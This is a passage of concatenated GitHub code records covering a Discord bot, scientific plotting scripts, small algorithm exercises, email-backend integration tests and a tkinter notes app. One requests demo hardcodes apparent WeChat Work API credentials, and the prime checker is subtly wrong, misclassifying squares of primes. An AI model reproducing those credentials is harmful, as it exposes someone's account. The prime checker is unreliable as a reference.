on_ready():\r\n print(\"Bot is ready\")\r\n\r\n@client.command()\r\nasync def location(ctx):\r\n await ctx.send(\"Hello, I provide forecast information for Charlottesville, VA.\")\r\n\r\n@client.command()\r\nasync def Help(ctx):\r\n await ctx.send(\"Hello, my name is Flint Lockwood, and I am here to answer any weather related questions for the day. 
You can type !help for a list of other commands, otherwise, simply ask me a question and I shall answer!\")\r\n\r\n@client.command()\r\nasync def whoami(ctx):\r\n await ctx.send(\"My name is Flint Lockwood, and I live in Swallow Falls. I am an inventor and made it so that instead of raining water, it rains food!\")\r\n\r\n@client.command()\r\nasync def rules(ctx):\r\n await ctx.send(\"No profanity! Respect Everyone. Enjoy the food that falls from the sky!\")\r\n\r\n\r\n@client.event\r\nasync def on_message(message):\r\n print(message.content)\r\n if message.author == client.user:\r\n return\r\n print(message.author)\r\n print(client.user)\r\n print(message.content)\r\n if message.content.startswith('!'):\r\n await client.process_commands(message)\r\n else:\r\n answer = chat(message.content)\r\n await message.channel.send(answer)\r\n\r\n\r\n@client.command()\r\n@commands.is_owner()\r\nasync def shutdown(context):\r\n exit()\r\n#load data in a stats table\r\n\r\n\r\nclient.run(TOKEN)","repo_name":"kttsai1/DS2002","sub_path":"data_project_2/bot.py","file_name":"bot.py","file_ext":"py","file_size_in_byte":4380,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"}
+{"seq_id":"19160741328","text":"from DiscUtils import *\nimport matplotlib.pyplot as plt\n\n\n# Trajectory paths\ndcdPath = '../Current_D1_trajectory/D1_combined_pbc_fixed.dcd'\npsfPath = '../Current_D1_trajectory/D1_combined.psf'\ndt = 2e-10 \n\ndef P_2(v, t):\n # the second order Legendre polynomial\n intervals = len(v) - t\n total = 0.0\n for t_0 in range(intervals):\n total += (np.vdot(v[t_0], v[t_0+t]) ** 2)\n avg = total / (intervals)\n return (3/2.) * avg - (1/2.)\n\n\ndef cos2theta_fun(initpos, pos):\n return np.power(np.vdot(initpos,pos),2)\n\n\ndef main():\n u = mda.Universe(psfPath, dcdPath)\n nframes = len(u.trajectory)\n # coarse grain atoms \n x1 = u.select_atoms('bynum 21', updating=True)\n x2 = u.select_atoms('bynum 232', updating=True)\n y1 = u.select_atoms('bynum 121', updating=True)\n y2 = u.select_atoms('bynum 332', updating=True)\n\n xs = np.zeros(nframes)\n x_axis_positions = np.zeros((nframes, 3))\n y_axis_positions = np.zeros((nframes, 3))\n z_axis_positions = np.zeros((nframes, 3))\n u_positions = np.zeros((nframes, 3))\n for i,ts in enumerate(u.trajectory):\n # Get local coordinate axes \n x1_pos = x1[0].position\n x2_pos = x2[0].position\n x = (x1_pos - x2_pos) / (np.linalg.norm(x1_pos - x2_pos))\n y1_pos = y1[0].position\n y2_pos = y2[0].position\n y = (y1_pos - y2_pos) / (np.linalg.norm(y1_pos - y2_pos))\n z = np.cross(x, y) \n \n x_axis_positions[i] = x \n y_axis_positions[i] = y \n z_axis_positions[i] = z / np.linalg.norm(z) \n \n # The unit vector is attached to one of the x-axis points\n # and subtends a 45 degree angle with the horizon\n tvec = (x + y + z) / np.linalg.norm(x + y + z)\n tpos = x1_pos + tvec \n u_positions[i] = (tpos - x1_pos) / np.linalg.norm(tpos - x1_pos)\n u_positions[i][0] = -u_positions[i][0]\n # X points for graphing \n #xs[i] = dt * i \n xs[i] = dt * i / (1e-9) \n\n print('initial pos of unit vector: {}'.format(u_positions[0]))\n print('initial pos of z-axis: {}'.format(z_axis_positions[0]))\n n = 6000 \n v = np.zeros(n)\n v[0] = 0\n theta = np.arccos(np.vdot(u_positions[0], z_axis_positions[0]))\n cos2theta = np.power(np.cos(theta), 2)\n sin2theta = np.power(np.sin(theta), 2) \n sin4theta = np.power(np.sin(theta), 4)\n alpha1 = (1/4.) * np.power((3 * cos2theta-1), 2)\n alpha2 = 3 * sin2theta * cos2theta\n alpha3 = (3/4.) 
* sin4theta\n initpos = u_positions[0]\n\n mod_positions = u_positions[:6000]\n for t in range(1,n):\n v[t] = P_2(mod_positions,t) \n\n \n # Fit to sum of exponentials\n def exponential_model(t,tau1, tau2, tau3):\n return alpha1 * np.exp(-t/tau1) + alpha2 * np.exp(-t/tau2) + alpha3 * np.exp(-t/tau3)\n\n v_fit = v[1:] # fitting cutoffs \n def fitfun(taus):\n l = len(v_fit)\n s = 0.0\n for t in range(l):\n s += np.power(v_fit[t]-exponential_model(t*dt,taus[0],taus[1],taus[2]), 2)\n s /= l \n return np.sqrt(s)\n\n from scipy import optimize\n minimum = optimize.minimize(fitfun, [1e-7, 1e-7, 1e-7], method='Nelder-Mead', options={'xatol':1e-11})\n print('Parameters of minimization: {}'.format(minimum.x))\n print('Alphas: {}, {}, {}'.format(alpha1,alpha2,alpha3))\n # Make some magic pictures\n fig = plt.figure()\n ax = fig.add_subplot(111)\n final_taus = minimum.x\n xs = np.zeros(len(v_fit))\n fit_ys = np.zeros(len(v_fit))\n calc_ys = np.zeros(len(v_fit))\n for i,val in enumerate(v_fit):\n input_val = i * dt\n fit_ys[i] = exponential_model(input_val, final_taus[0], final_taus[1], final_taus[2])\n calc_ys[i] = val \n xs[i] = input_val \n ax.plot(xs, calc_ys, 'b', xs, fit_ys, 'r')\n plt.show()\n \n \n f = open('t_vs_p2.csv', 'w')\n f.write('time,p2\\n')\n for i,val in enumerate(v):\n f.write('{},{}\\n'.format(i*dt,val))\n f.close() \n\nif __name__ == '__main__':\n main()\n\n","repo_name":"stationarysalesman/mister-disky","sub_path":"disky2.py","file_name":"disky2.py","file_ext":"py","file_size_in_byte":3986,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"}
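The P_2 loop in the record above recomputes dot products one lag at a time, which is O(n) per lag and O(n^2) over all lags. A vectorized NumPy equivalent (a minimal sketch, not part of the original script; `vectors` is a hypothetical (n, 3) array of unit vectors):

import numpy as np

def p2_autocorrelation(vectors, lag):
    n = len(vectors)
    # dot product of each frame with the frame `lag` steps later
    dots = np.einsum('ij,ij->i', vectors[:n - lag], vectors[lag:])
    # second-order Legendre polynomial averaged over all time origins
    return 1.5 * np.mean(dots ** 2) - 0.5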
+{"seq_id":"32670012618","text":"# Check Prime Number\nimport math\nimport random\n\n\ndef isPrime(n):\n print(\"n = \", n)\n sqrtN = int(math.sqrt(n))\n for i in range(2, sqrtN):\n if n % i == 0:\n print(\"i = \", i)\n return \"n is not prime\"\n return \"n is prime\"\n\n\nprint(isPrime(random.randrange(2, 32768)))\n","repo_name":"MinhoJJang/2023-first-semester","sub_path":"DataScience/Assignment/Week_01/isPrime.py","file_name":"isPrime.py","file_ext":"py","file_size_in_byte":303,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"}
+{"seq_id":"37692581641","text":"from typing import Any\n\n__all__ = (\n 'Node',\n 'Graph'\n)\n\n\nclass Node:\n def __init__(self, value: Any):\n self.value = value\n\n self.outbound = []\n self.inbound = []\n\n def point_to(self, other: 'Node'):\n self.outbound.append(other)\n other.inbound.append(self)\n\n def __str__(self):\n return f'Node({repr(self.value)})'\n\n __repr__ = __str__\n\n\nclass Graph:\n def __init__(self, root: Node):\n self._root = root\n\n def dfs(self) -> list[Node]:\n def recursive_dfs(node, res):\n if node not in res:\n res.append(node)\n for other in node.outbound:\n recursive_dfs(other, res)\n return\n\n result = [self._root]\n for node in self._root.outbound:\n recursive_dfs(node, result)\n return result\n\n\n\n def bfs(self) -> list[Node]:\n result = []\n queue = [self._root]\n while queue:\n if queue[-1] not in result:\n node = queue.pop()\n result.append(node)\n queue = node.outbound[::-1] + queue\n else:\n queue.pop()\n\n return result\n","repo_name":"eprush/hw-backend-summer-2023-1-algorithms","sub_path":"tasks/graph.py","file_name":"graph.py","file_ext":"py","file_size_in_byte":1191,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"}
+{"seq_id":"16293257724","text":"def get_days_in_month(month, year):\n\tif month in [4,6,9,11]:\n\t\treturn 30\n\telif month == 2:\n\t\tif year % 4 == 0:\n\t\t\tif year % 100 == 0 and year % 400 != 0:\n\t\t\t\treturn 28\n\t\t\treturn 29\n\t\telse:\n\t\t\treturn 28\n\telse:\n\t\treturn 31\n\n# Week starts on sunday = 0\nmonth_start_day = (1 + 365) % 7 # Initialize by knowing: 1 Jan 1900 was a Monday\nmonth = 1\nyear = 1901\n\ncount = 0\ndays_in_month = 0\nwhile year < 2001:\n\tmonth = 1\n\twhile month < 13:\n\t\t# Check this month start day\n\t\tif month_start_day == 0:\n\t\t\tcount += 1\n\n\t\t# Set up next month\n\t\tmonth_start_day = (month_start_day + get_days_in_month(month, year)) % 7\n\t\tmonth += 1\n\n\tyear += 1\n\nprint(count)","repo_name":"sabaduy/ProjectEuler","sub_path":"python/0019.py","file_name":"0019.py","file_ext":"py","file_size_in_byte":660,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"}
+{"seq_id":"39164027705","text":"import cassandra.cluster\nimport generator\nfrom cql_utils import *\n\nc = cassandra.cluster.Cluster(['localhost'])\nks = c.connect('chembise_metar_1_12')\n\ndata = generator.loadata()\n\ni = 0\nfor row in data:\n i = i + 1\n if (i % 1000) == 0:\n print(i)\n row = split_daytime(row)\n query = format_insert_query(\"date_by_location\", row)\n\n ks.execute(query)\n","repo_name":"danousna/metar","sub_path":"insert-data.py","file_name":"insert-data.py","file_ext":"py","file_size_in_byte":366,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"19"}
+{"seq_id":"20663318670","text":"import os\nimport glob\nimport argparse\n\nimport pandas as pd\nimport torch\n\nfrom utils.objdict import ObjDict\nfrom utils.mkdir_p import mkdir_p\n\nnext_line = '\\n'\nsaved_label_key = \"pred_ids\"\nof_mapping_key = \"overflow_mapping\"\n\ndef parse_arguments():\n parser = argparse.ArgumentParser()\n parser.add_argument('input_path',type=str)\n parser.add_argument('--write_dataset_only',action='store_true')\n parser.add_argument('--add_id',action='store_true')\n return parser.parse_args()\n\ndef convert_ids_to_string(cfg,device='cuda',out_str='pred_str.txt',write_dataset_only=False,add_id=False):\n pp = cfg.pipeline\n out_dict = {}\n checkpts = pp.get_model_checkpts(cfg.extract_cfg.model_dir,cfg.extract_cfg.model_key)\n if add_id:\n textids = pd.read_csv(cfg.preprocess_cfg.test_csv_path).id\n \n outfile = open(os.path.join(cfg.extract_cfg.output_dir,out_str),\"w\")\n checkpts.sort()\n for c in checkpts:\n print(\"Processing checkpoint \"+c)\n outfile.write(\"*\"*100+next_line)\n outfile.write(c+next_line)\n outfile.write(\"*\"*100+next_line)\n cdir = os.path.join(cfg.extract_cfg.output_dir,c)\n if not os.path.exists(cdir):\n print(cdir+\" not exist\")\n continue\n fs = [f for f in os.listdir(cdir) if \".pt\" in f]\n fs.sort()\n if not fs:\n print(\"empty folder: {}, skipping\".format(c))\n continue\n pred_ids = torch.cat([torch.load(os.path.join(cdir,f)) for f in fs if saved_label_key in f])\n if add_id:\n ids = torch.cat([torch.load(os.path.join(cdir,f)) for f in fs if of_mapping_key in f])\n pred_ids[pred_ids==-1] = 0\n if write_dataset_only:\n pred_idx = torch.sum(pred_ids,axis=1)!=0\n pred_ids = pred_ids[pred_idx]\n ids = ids[pred_idx]\n pp.print_message(c)\n\n strs = cfg.tokenizer.batch_decode(pred_ids,skip_special_tokens=True)\n if add_id:\n outfile.write(next_line.join([str(textids[int(ids[i])])+\": \"+str(i)+\", \"+s for i,s in enumerate(strs) if s]))\n else:\n outfile.write(next_line.join([str(i)+\", \"+s for i,s in enumerate(strs) if s]))\n outfile.write(next_line)\n outfile.close()\n\nif __name__ == \"__main__\":\n\n args = parse_arguments()\n\n if \"*\" in args.input_path:\n paths = glob.glob(args.input_path)\n else:\n paths = args.input_path.split(\",\")\n\n assert len(paths) > 0\n \n cfgs = [ObjDict.read_all_from_file_python3(p) for p in paths]\n assert all([hasattr(c,\"plot_label\",) for c in cfgs])\n \n data = {}\n for c in cfgs:\n convert_ids_to_string(c,write_dataset_only=args.write_dataset_only,add_id=args.add_id) \n","repo_name":"lucien1011/kaggle-coleridgeinitiative-show-us-the-data","sub_path":"postprocessing/make_text_from_saved_ids.py","file_name":"make_text_from_saved_ids.py","file_ext":"py","file_size_in_byte":2714,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"}
+{"seq_id":"40773490289","text":"import os\nimport unittest\nfrom datetime import datetime, timedelta\nfrom email.utils import formataddr\n\nfrom django.test import SimpleTestCase, override_settings, tag\n\nfrom anymail.exceptions import AnymailAPIError\nfrom anymail.message import AnymailMessage\n\nfrom .utils import AnymailTestMixin\n\nANYMAIL_TEST_SENDINBLUE_API_KEY = os.getenv(\"ANYMAIL_TEST_SENDINBLUE_API_KEY\")\nANYMAIL_TEST_SENDINBLUE_DOMAIN = os.getenv(\"ANYMAIL_TEST_SENDINBLUE_DOMAIN\")\n\n\n@tag(\"sendinblue\", \"live\")\n@unittest.skipUnless(\n ANYMAIL_TEST_SENDINBLUE_API_KEY and ANYMAIL_TEST_SENDINBLUE_DOMAIN,\n \"Set ANYMAIL_TEST_SENDINBLUE_API_KEY and ANYMAIL_TEST_SENDINBLUE_DOMAIN \"\n \"environment variables to run SendinBlue integration tests\",\n)\n@override_settings(\n ANYMAIL_SENDINBLUE_API_KEY=ANYMAIL_TEST_SENDINBLUE_API_KEY,\n ANYMAIL_SENDINBLUE_SEND_DEFAULTS=dict(),\n EMAIL_BACKEND=\"anymail.backends.sendinblue.EmailBackend\",\n)\nclass SendinBlueBackendIntegrationTests(AnymailTestMixin, SimpleTestCase):\n \"\"\"SendinBlue v3 API integration tests\n\n SendinBlue doesn't have sandbox so these tests run\n against the **live** SendinBlue API, using the\n environment variable `ANYMAIL_TEST_SENDINBLUE_API_KEY` as the API key,\n and `ANYMAIL_TEST_SENDINBLUE_DOMAIN` to construct sender addresses.\n If those variables are not set, these tests won't run.\n\n https://developers.sendinblue.com/docs/faq#section-how-can-i-test-the-api-\n\n \"\"\"\n\n def setUp(self):\n super().setUp()\n self.from_email = \"from@%s\" % ANYMAIL_TEST_SENDINBLUE_DOMAIN\n self.message = AnymailMessage(\n \"Anymail SendinBlue integration test\",\n \"Text content\",\n self.from_email,\n [\"test+to1@anymail.dev\"],\n )\n self.message.attach_alternative(\"
HTML content
\", \"text/html\")\n\n def test_simple_send(self):\n # Example of getting the SendinBlue send status and message id from the message\n sent_count = self.message.send()\n self.assertEqual(sent_count, 1)\n\n anymail_status = self.message.anymail_status\n sent_status = anymail_status.recipients[\"test+to1@anymail.dev\"].status\n message_id = anymail_status.recipients[\"test+to1@anymail.dev\"].message_id\n\n self.assertEqual(sent_status, \"queued\") # SendinBlue always queues\n # Message-ID can be ...@smtp-relay.mail.fr or .sendinblue.com:\n self.assertRegex(message_id, r\"\\<.+@.+\\>\")\n # set of all recipient statuses:\n self.assertEqual(anymail_status.status, {sent_status})\n self.assertEqual(anymail_status.message_id, message_id)\n\n def test_all_options(self):\n send_at = datetime.now() + timedelta(minutes=2)\n message = AnymailMessage(\n subject=\"Anymail SendinBlue all-options integration test\",\n body=\"This is the text body\",\n from_email=formataddr((\"Test From, with comma\", self.from_email)),\n to=[\"test+to1@anymail.dev\", '\"Recipient 2, OK?\" '],\n cc=[\"test+cc1@anymail.dev\", \"Copy 2 \"],\n bcc=[\"test+bcc1@anymail.dev\", \"Blind Copy 2 \"],\n # SendinBlue API v3 only supports single reply-to\n reply_to=['\"Reply, with comma\" '],\n headers={\"X-Anymail-Test\": \"value\", \"X-Anymail-Count\": 3},\n metadata={\"meta1\": \"simple string\", \"meta2\": 2},\n send_at=send_at,\n tags=[\"tag 1\", \"tag 2\"],\n )\n # SendinBlue requires an HTML body:\n message.attach_alternative(\"
HTML content
\", \"text/html\")\n\n message.attach(\"attachment1.txt\", \"Here is some\\ntext for you\", \"text/plain\")\n message.attach(\"attachment2.csv\", \"ID,Name\\n1,Amy Lina\", \"text/csv\")\n\n message.send()\n # SendinBlue always queues:\n self.assertEqual(message.anymail_status.status, {\"queued\"})\n self.assertRegex(message.anymail_status.message_id, r\"\\<.+@.+\\>\")\n\n def test_template(self):\n message = AnymailMessage(\n # There is a *new-style* template with this id in the Anymail test account:\n template_id=5,\n # Override template sender:\n from_email=formataddr((\"Sender\", self.from_email)),\n # No batch send (so max one recipient suggested):\n to=[\"Recipient \"],\n reply_to=[\"Do not reply \"],\n tags=[\"using-template\"],\n headers={\"X-Anymail-Test\": \"group: A, variation: C\"},\n merge_global_data={\n # The Anymail test template includes `{{ params.SHIP_DATE }}`\n # and `{{ params.ORDER_ID }}` substitutions\n \"SHIP_DATE\": \"yesterday\",\n \"ORDER_ID\": \"12345\",\n },\n metadata={\"customer-id\": \"ZXK9123\", \"meta2\": 2},\n )\n\n # Normal attachments don't work with Brevo templates:\n # message.attach(\"attachment1.txt\", \"Here is some\\ntext\", \"text/plain\")\n # If you can host the attachment content on some publicly-accessible URL,\n # this *non-portable* alternative allows sending attachments with templates:\n message.esp_extra = {\n \"attachment\": [\n {\n \"name\": \"attachment1.txt\",\n # URL where Brevo can download the attachment content while\n # sending (must be content-type: text/plain):\n \"url\": \"https://raw.githubusercontent.com/anymail/django-anymail/\"\n \"main/docs/_readme/template.txt\",\n }\n ]\n }\n\n message.send()\n # SendinBlue always queues:\n self.assertEqual(message.anymail_status.status, {\"queued\"})\n self.assertRegex(message.anymail_status.message_id, r\"\\<.+@.+\\>\")\n\n @override_settings(ANYMAIL_SENDINBLUE_API_KEY=\"Hey, that's not an API key!\")\n def test_invalid_api_key(self):\n with self.assertRaises(AnymailAPIError) as cm:\n self.message.send()\n err = cm.exception\n self.assertEqual(err.status_code, 401)\n # Make sure the exception message includes SendinBlue's response:\n self.assertIn(\"Key not found\", str(err))\n","repo_name":"anymail/django-anymail","sub_path":"tests/test_sendinblue_integration.py","file_name":"test_sendinblue_integration.py","file_ext":"py","file_size_in_byte":6240,"program_lang":"python","lang":"en","doc_type":"code","stars":1517,"dataset":"github-code","pt":"39"}
+{"seq_id":"15693931589","text":"class Solution:\n \"\"\"\n 给定一个整数数组 nums ,找到一个具有最大和的连续子数组(子数组最少包含一个元素),返回其最大和\n 主要思想,只有当sum[:i]-sum[:j]>0的时候,才会对最大和有帮助\n\n [num[0], num[1],......num[i]......num[n-1]]\n 动态规划的是首先对数组进行遍历,当前位置i最大连续子序列和为 sum,sum起始值为0,历史最大子序列结果为 ans,ans起始值为num[0]\n 如果 sum > 0,则说明 sum 对结果有增益效果,则 sum 保留并加上当前遍历数字\n 如果 sum <= 0,则说明 sum 对结果无增益效果,需要舍弃,则 sum 直接更新为当前遍历数字\n 每次比较 当前sum 和 历史ans的大小,将最大值置为ans,继续往后遍历,遍历结束返回结果\n 时间复杂度:O(n)\n \"\"\"\n @staticmethod\n def max_sub_array(nums):\n sum = 0\n history_max_sum = nums[0]\n for num in nums:\n if sum > 0:\n sum += num\n else:\n sum = num\n print(\"历史最大值以及当前最大值:\",history_max_sum,sum)\n history_max_sum = max(history_max_sum,sum)\n return history_max_sum\n\n def maxSubArray(nums):\n pre_sum = 0\n ans = nums[0]\n for num in nums:\n pre_sum = max(pre_sum+num, num)\n print(pre_sum,ans)\n ans = max(pre_sum,ans)\n return ans\n\nif __name__ == \"__main__\":\n nums = [-2,1,-3,4,-1,2,1,-5,4]\n result = Solution.max_sub_array(nums)\n print(\"The max su array is:\", result)\n\n\n\n\n","repo_name":"tinghe0928/leetcode","sub_path":"sliding_window/max_sub_array.py","file_name":"max_sub_array.py","file_ext":"py","file_size_in_byte":1616,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"}
+{"seq_id":"25599571509","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sun Dec 23 17:41:00 2018\n\n@author: bencooper\n\"\"\"\n\nimport os\n\nclass DirGen:\n @staticmethod\n def create_dir(path):\n if os.path.isdir(path) == False:\n os.makedirs(path)\n ","repo_name":"cooperb0199/TSForecasting","sub_path":"utils/dir_generator.py","file_name":"dir_generator.py","file_ext":"py","file_size_in_byte":260,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"}
+{"seq_id":"9147523534","text":"#!/usr/bin/env python\n\n#figure parameter set up\nimport matplotlib.pyplot as plt\nplt.rcParams['figure.dpi'] = 100\nplt.rcParams[\"figure.figsize\"] = [15.0, 6.0]\n# %config InlineBackend.figure_format = 'svg'\n# %matplotlib inline\n\nimport pandas as pd\n\ntotal_match = pd.read_csv('vis_results/total_match.csv', sep = ',')\n\nno_prediction = pd.read_csv('vis_results/no_prediction.csv', sep = ',')\n\nno_prediction_but_E = pd.read_csv('vis_results/no_prediction_but_enzyme.csv', sep = ',')\n\n\nnon_enzyme_correct = pd.read_csv('vis_results/non_enzyme_correct.csv', sep = ',')\n\nPNEBE = pd.read_csv('vis_results/predicted_non_enzyme_but_enzyme.csv', sep = ',')\n\n\nPEBnonE = pd.read_csv('vis_results/predicted_enzyme_but_non_enzyme', sep = ',')\n\ntotal_correct = pd.read_csv('vis_results/correct_to_fourth_digit.csv', sep = ',')\n\n\nthird_digit_correct = pd.read_csv('vis_results/correct_to_third_digit.csv', sep = ',')\n\n\nsecond_digit_correct = pd.read_csv('vis_results/correct_to_second_digit.csv', sep = ',')\n\n\nfirst_digit_correct = pd.read_csv('vis_results/correct_to_first_digit.csv', sep = ',')\n\nfirst_digit_wrong = pd.read_csv('vis_results/first_digit_wrong.csv', sep = ',')\n\ndf_EC = pd.read_csv('vis_results/df_EC.csv', sep = ',')\n\nimport matplotlib.pyplot as plt\n\n\n\ndataframes = [no_prediction,\n PNEBE,\n PEBnonE,\n non_enzyme_correct,\n total_match,\n third_digit_correct,\n second_digit_correct,\n first_digit_correct,\n first_digit_wrong]\n\n\n\nlengths = [len(i) for i in dataframes[0:4]]\ndigits = [len(i) for i in dataframes[4:]]\nlengths.append(sum(digits))\n\npercent_lengths = [i/sum(lengths) for i in lengths]\n\npercent_digits = [i/sum(digits) for i in digits]\n\nbarwidth = 1\n\n\n# create data\nx = ['ECpred \\noverall \\nperformance']\n\n\nlabel_list_lengths = ['No Prediction',\n 'Predicted Non-Enzyme but Enzyme',\n 'Predicted Enzyme but non-Enzyme',\n 'Non Enzyme Correct',\n 'Predicted EC number'] \n\n\ny1 = percent_lengths[4]\ny2 = percent_lengths[3]\ny3 = percent_lengths[2]\ny4 = percent_lengths[1]\ny5 = percent_lengths[0]\n\ncolor = ['b','c','y','g','r']\n# plot bars in stack manner\nplt.bar(x, y1, color= 'b')#color[0])\nplt.bar(x, y2, bottom=y1, color='c')\nplt.bar(x, y3, bottom=y1+y2, color='y')\nplt.bar(x, y4, bottom=y1+y2+y3, color= 'g')\nplt.bar(x, y5, bottom= y1+y2+y3+y4, color = 'r')#'#ff9500')\nplt.legend(label_list_lengths[::-1], bbox_to_anchor=(1.5,1.5), ncol=5,loc='center')\n\n# create data\nx = ['ECpred \\ndigits']\n\n\n\nlabel_list_digits = ['Total correct',\n 'third digit correct',\n 'second digit correct',\n 'first digit correct',\n 'first digit wrong']\n\n\ny1 = percent_digits[0]\ny2 = percent_digits[1]\ny3 = percent_digits[2]\ny4 = percent_digits[3]\ny5 = percent_digits[4]\n \n# plot bars in stack manner\ncolors = ['#377697','#4fa9d9','#72bae0','#a7d4ec','#fdab91']\nplt.rcParams[\"figure.figsize\"] = [5,5]\nplt.bar(x, y1, color= colors[0])#, width = barwidth)\nplt.bar(x, y2, bottom=y1, color = colors[1])#, width = barwidth), width = barwidth)\nplt.bar(x, y3, bottom=y1+y2,color = colors[2])#, width = barwidth), width = barwidth)\nplt.bar(x, y4, bottom=y1+y2+y3, color = colors[3])#, width = barwidth), width = barwidth)\nplt.bar(x, y5, bottom= y1+y2+y3+y4, color = colors[4])#, width = barwidth), width = barwidth)\n\n\n\nplt.ylabel(\"Fraction of the Whole\")\nplt.legend(label_list_digits, bbox_to_anchor=(1.5,1.5), ncol=5,loc='center')\n\nplt.savefig('vis_results/overall_performance.png', format='png', dpi=800)\n\nprint('all 
done')","repo_name":"Sakib1418/Benchmarking-Enzyme-Classifiers","sub_path":"visualization/overall_performance.py","file_name":"overall_performance.py","file_ext":"py","file_size_in_byte":3660,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"}
+{"seq_id":"1049945562","text":"\"\"\"Here you will find functions for getting rid of the same data points.\"\"\"\nfrom math import inf\nimport numpy as np\n\n\ndef dedup(x, y):\n\t\"\"\"Deduplicate the arguments for fitting.\n\t\n\tArgs:\n\t\tx (iterable): values to dedup.\n\t\ty (iterable): corresponding values.\n\tReturns:\n\t\ttuple with values from the input, but retaining only the first\n\t\tamong the repeating ones.\n\t\"\"\"\n\tx1 = []\n\ty1 = []\n\tXprev = -inf\n\tfor X,Y in zip(x,y):\n\t\tif X > Xprev:\n\t\t\tx1.append(X)\n\t\t\ty1.append(Y)\n\t\tXprev = X\n\treturn x1, y1\n\n\ndef dedup_np(x,y):\n\t\"\"\"Deduplicate the arguments for fitting.\n\t\n\tMuch faster then dedup.\n\n\tArgs:\n\t\tx (np.array): values to dedup.\n\t\ty (np.array): corresponding values.\n\tReturns:\n\t\ttuple with values from the input, but retaining only the first\n\t\tamong the repeating ones.\n\t\"\"\"\n\to = np.full(x.shape, True)\n\to[1:] = np.diff(x) > 0\n\treturn x[o], y[o]\n\n\n","repo_name":"MatteoLacki/rta","sub_path":"rta/array_operations/dedupy.py","file_name":"dedupy.py","file_ext":"py","file_size_in_byte":846,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"39"}
+{"seq_id":"27870485744","text":"import requests\n\n\ndef test_request():\n url = 'http://httpbin.org/get'\n payload = {'key1':'value1','key2':['value2', 'value3']}\n r = requests.get(url,params = payload)\n print(r)\n\n with open('','r',encoding='utf-8') as f:\n file = f.read()\n\ndef test_request1():\n id = 'wwdae6409305b8bd0c'\n select = 'yfVfCz4aehQ1etcO9Rqh9lx9GPpdcjute5Zyi9w8ZO0'\n url = 'https://qyapi.weixin.qq.com/cgi-bin/gettoken'\n header ={'corpid':'wwdae6409305b8bd0c',\n 'corpsecret':'yfVfCz4aehQ1etcO9Rqh9lx9GPpdcjute5Zyi9w8ZO0'}\n #r =requests.get(url,headers=headers)\n\n r = requests.get(url,params=header)\n print(r.json())\n token = r.json()['access_token']\n print(token)\n with open('token.yaml','w',encoding='UTF-8') as f:\n f.write(token)\n\n\n\n\n\n","repo_name":"zhuanfang/python","sub_path":"file/从零学Python/day06/requests_use.py","file_name":"requests_use.py","file_ext":"py","file_size_in_byte":785,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"}
+{"seq_id":"32421586302","text":"import matplotlib.pyplot as plt\nimport random\n\ndef createPlot() :\n # Générer des données aléatoires\n\n plt.clf()\n\n nombre_requetes = 100\n temps = list(range(nombre_requetes))\n valeurs = [random.randint(0, 100) for _ in range(nombre_requetes)]\n\n # Créer le graphique\n plt.plot(temps, valeurs)\n plt.xlabel('Temps')\n plt.ylabel('Nombre de requêtes')\n\n # Sauvegarder le graphique au format JPEG\n plt.savefig('static/img/graphique.jpg', format='jpeg')","repo_name":"pleijan/AwareNet","sub_path":"CreatePlot.py","file_name":"CreatePlot.py","file_ext":"py","file_size_in_byte":484,"program_lang":"python","lang":"fr","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"}
+{"seq_id":"31927559884","text":"import random\n\nclass Rational:\n def __init__(self, num, den):\n self.num = num\n self.den = den\n \n def mul(self, other):\n if isinstance(other, Rational):\n num = self.num * other.num\n den = self.den * other.den\n return Rational(num, den)\n elif isinstance(other, int):\n num = self.num * other\n return Rational(num, self.den)\n else:\n raise TypeError(\"Unsupported operand type(s) for *: '{}' and '{}'\".format(type(self), type(other)))\n \n def truediv(self, other):\n if isinstance(other, Rational):\n num = self.num * other.den\n den = self.den * other.num\n return Rational(num, den)\n elif isinstance(other, int):\n den = self.den * other\n return Rational(self.num, den)\n else:\n raise TypeError(\"Unsupported operand type(s) for /: '{}' and '{}'\".format(type(self), type(other)))\n \n @staticmethod\n def random_fraction(low, high):\n num = random.randint(low, high)\n den = random.randint(low, high)\n while den == 0:\n den = random.randint(low, high)\n return Rational(num, den)","repo_name":"NikitaKurganovich/BSUIR","sub_path":"MPL/Lab/Lab3/Part 1/Rational.py","file_name":"Rational.py","file_ext":"py","file_size_in_byte":1219,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"}
+{"seq_id":"17707724767","text":"from tkinter import *\nfrom tkinter import messagebox\nimport json\nimport os\nfrom notes import notes\n\n\ndef registration_successfully_completed():\n btn.destroy()\n global folder_name\n lbl = Label(root, text='Приветствуем вас {}, авторизация успешно пройдена!!'.format(txt.get()))\n lbl.grid(column=0, row=0)\n folder_name = txt.get()\n txt.delete('0', END)\n txt.destroy()\n try:\n os.mkdir(f'{folder_name}')\n label = Label(root, text='Под вашим никнеймом предыдущих заметок не обнаружено')\n label.grid(column=0, row=2)\n button = Button(root, text=\"Создать новую заметку!\", command=go_in_notes)\n button.grid(column=0, row=3)\n except:\n found_old_files(folder_name)\n\n\ndef go_in_notes():\n notes(folder_name)\n\n\ndef found_old_files(entered_text):\n otvet = []\n row = 1\n try:\n for filename in os.listdir(f'{entered_text}'):\n with open(os.path.join(f'{entered_text}', filename), 'r') as file:\n text = file.read()\n found_files = (filename, 'с текстом:', text)\n otvet.append(found_files)\n label = Label(root, text='Под вашим никнеймом обнаружены следующие файлы:')\n label.grid(column=0, row=1)\n for i in range(len(otvet)):\n row += 1\n label = Label(root, 